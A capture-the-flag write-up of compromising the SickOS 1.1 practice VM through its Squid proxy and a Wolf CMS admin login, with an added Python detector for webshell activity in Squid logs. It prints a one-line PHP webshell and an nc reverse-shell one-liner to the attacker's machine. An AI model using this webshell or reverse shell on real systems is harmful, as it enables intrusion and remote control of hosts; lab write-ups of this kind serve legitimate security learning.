Writeup SickOS 1.1

Published on 15 Jun 2016

Intro

I came across the subreddit /r/oscp recently and found a comment suggesting that you practice hacking VulnHub VMs before taking the PWK course. One of the most recommended VMs is SickOS. In this post I will explain how I hacked SickOS 1.1.

Scanning and Discovery

I configured the SickOs VM network as host-only, so it can reach my machine.

[image: host-only]

First, I need to know the IP address of the target. I use netdiscover for this, with the network interface set to vboxnet0, the same one SickOs is on.

[image: netdiscover]

After running netdiscover, I found that the IP address is 192.168.56.101. Then I ran nmap; the -sC flag runs the default NSE scripts against the target.

$ nmap -sC 192.168.56.101

Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-13 22:04 WIB
Nmap scan report for 192.168.56.101
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 08:00:27:A7:85:FF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 34.17 seconds

There are 2 open ports, 22 and 3128. Port 3128 is a Squid HTTP proxy, so I configured my Burp Suite upstream proxy to 192.168.56.101:3128 for all destination hosts.

[image: upstream]

When I tried to access 127.0.0.1, it gave me a BLEHHH message. That's not my localhost, so it must be SickOs's localhost, reached through the proxy.

[image: bleh]

Next, I ran content discovery in Burp and found a directory named /wolfcms.

[image: content discovery]

So I visited /wolfcms.

[image: wolfcms]

Exploitation

I needed to find the login page. Based on this article, the login page can be accessed at http://example.com/?admin/, so I tried to log in using admin:admin. Voila! It works.

[image: login]

So I logged in as admin and got access to the dashboard. I strolled around the dashboard and found a file manager feature, so I tried to upload a simple PHP backdoor.

[image: upload file]

Here is the code; I named it cmd.php:

<?php system($_REQUEST['c']); ?>

I successfully uploaded the PHP backdoor.

[image: upload file]

The PHP backdoor can be accessed under /public/, so I tested it with this request:

[image: request]

The response was:

[image: response]

I need to change the method to POST, so I don't have to URL-encode my payload.

[image: method post]

Then I executed a reverse shell that connects back to my nc listener on port 9999:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 9999 >/tmp/f

Finally, I got a reverse shell.
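As an added example (not part of the original writeup), here is a small Python detector for the activity above from the defender's side: it parses Squid's native access.log format and flags requests that execute PHP out of the Wolf CMS upload directory, which is where the file manager put cmd.php. The log lines are constructed, and both the upload path /wolfcms/public/ and the log layout are assumptions.

```python
import re
from typing import Optional

# Squid native access.log layout (assumption):
# <ts> <elapsed> <client> <result/status> <bytes> <method> <url> <ident> <hierarchy/peer> <type>
SQUID_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+(?P<result>\S+)\s+"
    r"(?P<bytes>\d+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<ident>\S+)\s+"
    r"(?P<hier>\S+)\s+(?P<ctype>\S+)$"
)
# Directory the Wolf CMS file manager writes uploads to (assumption); PHP should never run from here.
UPLOAD_DIR = "/wolfcms/public/"
# Heuristic: command separators in a query string; '&' is deliberately excluded (normal in URLs).
SHELL_META = re.compile(r"[;|`]|%3b|%7c", re.IGNORECASE)

def parse_squid_line(line: str) -> Optional[dict]:
    m = SQUID_RE.match(line.strip())
    return m.groupdict() if m else None

def webshell_indicators(entry: dict) -> list:
    """Return the reasons a parsed log entry looks like webshell use (empty list = benign)."""
    path, _, query = entry["url"].partition("?")
    path = re.sub(r"^https?://[^/]+", "", path)  # drop scheme and host, keep the URL path
    reasons = []
    if path.lower().endswith(".php") and path.startswith(UPLOAD_DIR):
        reasons.append("php executed from upload dir")
        if entry["method"] == "POST":
            reasons.append("POST to upload dir script")  # payload hidden in the body
    if SHELL_META.search(query):
        reasons.append("shell metacharacters in query")
    return reasons

def find_webshell_activity(lines):
    """Yield (client, method, url, reasons) for every suspicious entry in the log."""
    hits = []
    for line in lines:
        entry = parse_squid_line(line)
        if entry is None:
            continue  # unparseable line; a real pipeline would count these
        reasons = webshell_indicators(entry)
        if reasons:
            hits.append((entry["client"], entry["method"], entry["url"], reasons))
    return hits

# Constructed sample log: two benign CMS requests, then the GET and POST to the uploaded cmd.php.
SAMPLE_LOG = [
    "1465830240.101     12 192.168.56.1 TCP_MISS/200 2310 GET http://127.0.0.1/wolfcms/?admin/ - HIER_DIRECT/127.0.0.1 text/html",
    "1465830241.202      8 192.168.56.1 TCP_MISS/200 4120 GET http://127.0.0.1/wolfcms/public/images/logo.png - HIER_DIRECT/127.0.0.1 image/png",
    "1465830242.303     15 192.168.56.1 TCP_MISS/200 60 GET http://127.0.0.1/wolfcms/public/cmd.php?c=id - HIER_DIRECT/127.0.0.1 text/html",
    "1465830243.404  30012 192.168.56.1 TCP_MISS/200 0 POST http://127.0.0.1/wolfcms/public/cmd.php - HIER_DIRECT/127.0.0.1 text/html",
]

if __name__ == "__main__":
    for hit in find_webshell_activity(SAMPLE_LOG):
        print(hit)
```

A very long elapsed time on a tiny POST, as in the last sample line, is the reverse shell holding the connection open; the same check works against the CMS host's own web-server log once the host prefix is removed.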

Post Exploitation

Now that I have a limited shell, my goal is to escalate privileges and obtain root access. I found the database config file and tried its password on the user sickos to check for password reuse; it worked, and I ran sudo su to get root.

[image: root]

That's it! Finally, I obtained root access and got the flag.